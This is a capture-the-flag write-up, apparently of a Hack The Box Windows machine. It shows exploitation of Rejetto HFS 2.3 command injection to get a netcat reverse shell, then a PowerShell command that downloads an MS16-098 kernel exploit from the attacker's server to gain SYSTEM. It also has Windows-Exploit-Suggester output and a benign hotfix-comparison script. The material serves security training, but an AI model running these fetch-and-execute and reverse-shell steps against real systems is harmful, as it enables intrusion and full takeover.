Scanning and Enumeration:
nmap:
nmap -sC -sV -O 10.10.10.8
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-30 05:32 EDT
Nmap scan report for 10.10.10.8
Host is up (0.20s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
....
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.49 seconds
One port is open:
80/tcp open http HttpFileServer httpd 2.3
Rejetto HTTP File Server (HFS) 2.3.x – Remote Command Execution (2)
Using this exploit (Exploit-DB 39161, run as 39161.py below; the underlying bug is CVE-2014-6287, command injection through HFS template macros in the search parameter) has two prerequisites:
1. A web server listening on port 80 on the attacking machine, with netcat.exe (nc.exe) in the served directory: the exploit makes the target download it from there.
2. Edit ip_addr and local_port inside the exploit to the attacker's IP and the port the reverse-shell listener will use.
The script's own header notes that it may need to be run more than once before the shell comes back.
Exploit:
locate nc.exe    // find a copy of nc.exe on the attacking machine
/usr/share/seclists/Web-Shells/FuzzDB/nc.exe
/usr/share/windows-resources/binaries/nc.exe
cp /usr/share/windows-resources/binaries/nc.exe .    // copy nc.exe into the current directory
python2 -m SimpleHTTPServer 80    // serve the current directory on port 80 so the exploit can fetch nc.exe
python2 39161.py 10.10.10.8 80    // run the exploit against the target (IP and HFS port)
rlwrap nc -nlvp 4444    // listener for the reverse shell; start it before the exploit, and the port must match local_port in the script
Privilege Escalation
Use Windows-Exploit-Suggester to find out whether the target is missing patches for known privilege-escalation vulnerabilities.
Download the project:
git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
Install the dependency:
pip install xlrd --upgrade
Update the database (downloads the Microsoft security bulletin data into an Excel spreadsheet):
python2 windows-exploit-suggester.py --update
On the target, run systeminfo and save its output on the attacking machine as sysinfo.txt (the file passed with --systeminfo below):
┌──(root㉿kali)-[~/Desktop/HTB/tool/Windows-Exploit-Suggester]
└─# python2 windows-exploit-suggester.py --database 2023-08-30-mssb.xls --systeminfo sysinfo.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits
[*] there are now 246 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2012 R2 64-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*] https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*] https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*] https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*]
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
[*]
......
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[*] done
---
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
Traceback (most recent call last):
File "windows-exploit-suggester.py", line 1639, in <module>
main()
File "windows-exploit-suggester.py", line 414, in main
wb = xlrd.open_workbook(ARGS.database)
File "/usr/local/lib/python2.7/dist-packages/xlrd/__init__.py", line 170, in open_workbook
raise XLRDError(FILE_FORMAT_DESCRIPTIONS[file_format]+'; not supported')
xlrd.biffh.XLRDError: Excel xlsx file; not supported
If the error above appears (xlrd 2.x dropped .xlsx support, and the --update step writes an .xlsx), pin the older version of the library and re-run the command:
pip install xlrd==1.2.0
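The core check Windows-Exploit-Suggester performs is simple: read the hotfix list out of systeminfo and report every bulletin whose KB is not installed. The following is an added example written for this page (not the tool's own code and not from the writeup) that re-implements that check over a constructed systeminfo sample. The bulletin table is a hand-picked subset: MS16-135 and MS16-098 with the KB numbers from their titles in the output above, plus MS16-032 (KB3143141) included so that one bulletin counts as patched; it is not the tool's database.

```python
"""Added example: the hotfix-versus-bulletin comparison Windows-Exploit-Suggester
does, re-implemented on a constructed systeminfo sample. Not the tool's code."""
import re
from typing import Dict, List, Set, Tuple

# Constructed sample: the shape of `systeminfo` output on Windows Server
# 2012 R2, trimmed to the fields the suggester keys on.
SAMPLE_SYSTEMINFO = """\
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 4 Hotfix(s) Installed.
                           [01]: KB2919355
                           [02]: KB2919442
                           [03]: KB3000850
                           [04]: KB3143141
Network Card(s):           1 NIC(s) Installed.
"""

# Assumed subset of the bulletin database: bulletin -> (KB from its title, summary).
BULLETINS: Dict[str, Tuple[str, str]] = {
    "MS16-135": ("KB3199135", "Security Update for Windows Kernel-Mode Drivers"),
    "MS16-098": ("KB3178466", "Security Update for Windows Kernel-Mode Drivers"),
    "MS16-032": ("KB3143141", "Security Update for Secondary Logon"),
}

KB_RE = re.compile(r"KB(\d+)", re.IGNORECASE)


def parse_systeminfo(text: str) -> Dict[str, object]:
    """Extract OS name, version, architecture and the set of installed KBs.

    The hotfix list is a 'Hotfix(s):' header followed by indented '[NN]: KBnnnnnn'
    continuation lines, so those are consumed until the next 'Key: value' line.
    """
    fields: Dict[str, str] = {}
    hotfixes: Set[str] = set()
    in_hotfixes = False
    for line in text.splitlines():
        if in_hotfixes:
            m = KB_RE.search(line)
            if m and line.startswith(" "):
                hotfixes.add("KB" + m.group(1))
                continue
            in_hotfixes = False  # first non-KB line ends the hotfix block
        if ":" in line:
            key, _, value = line.partition(":")
            key, value = key.strip(), value.strip()
            fields[key] = value
            if key.startswith("Hotfix"):
                in_hotfixes = True
    return {
        "os_name": fields.get("OS Name", ""),
        "os_version": fields.get("OS Version", ""),
        "x64": "x64" in fields.get("System Type", ""),
        "hotfixes": hotfixes,
    }


def missing_bulletins(info: Dict[str, object],
                      bulletins: Dict[str, Tuple[str, str]] = BULLETINS) -> List[str]:
    """Bulletins whose KB is absent from the installed hotfixes (the tool's
    'remaining vulns'). Supersedence is not tracked here, which is one reason
    such a list is a set of candidates to verify, not confirmed vulnerabilities."""
    installed = info["hotfixes"]
    return sorted(b for b, (kb, _) in bulletins.items() if kb not in installed)


if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    arch = "64-bit" if info["x64"] else "32-bit"
    print(f"[+] {info['os_name']} ({info['os_version']}, {arch})")
    print(f"[*] {len(info['hotfixes'])} hotfix(es) installed")
    for bulletin in missing_bulletins(info):
        kb, summary = BULLETINS[bulletin]
        print(f"[E] {bulletin}: {summary} ({kb} missing)")
```

Replace SAMPLE_SYSTEMINFO with the real sysinfo.txt contents to see which of the subset applies; the real tool does the same comparison against the full spreadsheet, which is why its output runs to hundreds of entries that still need manual triage against the OS version and architecture it identifies.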
Microsoft Windows 8.1 (x64) – ‘RGNOBJ’ Integer Overflow (MS16-098)
Transfer the privilege-escalation binary to the target:
Attacker: python2 -m SimpleHTTPServer 9005
Target: powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.11:9005/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"
c:\Users\Public\Downloads>41020.exe
41020.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
c:\Users\Public\Downloads>whoami
whoami
nt authority\system
Get FLAG:
c:\Users\Administrator\Desktop>type root.txt
type root.txt
375a8619...
c:\Users\kostas\Desktop>type user.txt
type user.txt
d99d457f...